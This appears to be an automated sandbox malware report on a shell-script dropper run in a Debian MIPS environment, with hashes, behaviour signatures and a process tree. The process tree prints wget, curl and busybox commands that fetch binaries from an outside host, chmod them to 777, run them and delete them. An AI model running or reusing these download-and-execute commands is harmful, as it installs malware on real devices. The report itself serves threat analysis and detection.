Analysis

  • max time kernel
    149s
  • max time network
    20s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    21/10/2024, 01:32

General

  • Target

    9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh

  • Size

    10KB

  • MD5

    b319003c3c601274b8d3c96e303370c0

  • SHA1

    9fe9064eb8767a3ea42c466bf21bce04eee50006

  • SHA256

    9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d

  • SHA512

    d215c64d523bfa6118135a76e27c20d1e7c53b3875d78412c3a25647e0075ee43bce16c44821f92b0acf65cd485b6f3067fc9beadb5daa282a1ba39768c33394

  • SSDEEP

    192:voNYIHKWYUzPf7v6qfo0M+//YJSw1zPL36qfo0G//YJXIYIHKWe:voOq76qfo0M+//YJSwh6qfo0G//YJX9

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 2 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 8 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
    /tmp/9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
    1⤵
      PID:703
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:705
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
          2⤵
          • System Network Configuration Discovery
          PID:711
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:721
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
          2⤵
          • System Network Configuration Discovery
          PID:732
        • /bin/chmod
          chmod 777 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
          2⤵
          • File and Directory Permissions Modification
          PID:744
        • /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
          ./0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
          2⤵
          • Executes dropped EXE
          PID:746
        • /bin/rm
          rm 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK
          2⤵
            PID:748
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
            2⤵
            • System Network Configuration Discovery
            PID:750
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
            2⤵
            • Reads runtime system information
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:758
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
            2⤵
            • System Network Configuration Discovery
            PID:765
          • /bin/chmod
            chmod 777 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
            2⤵
            • File and Directory Permissions Modification
            PID:770
          • /tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
            ./RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
            2⤵
            • Executes dropped EXE
            PID:771
          • /bin/rm
            rm RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo
            2⤵
              PID:776
            • /usr/bin/wget
              wget http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6
              2⤵
              • System Network Configuration Discovery
              PID:777
            • /usr/bin/curl
              curl -O http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6
              2⤵
              • Reads runtime system information
              • System Network Configuration Discovery
              PID:790

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK

                  Filesize

                  153B

                  MD5

                  998368d7c95ea4293237f2320546e440

                  SHA1

                  30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

                  SHA256

                  533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

                  SHA512

                  648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97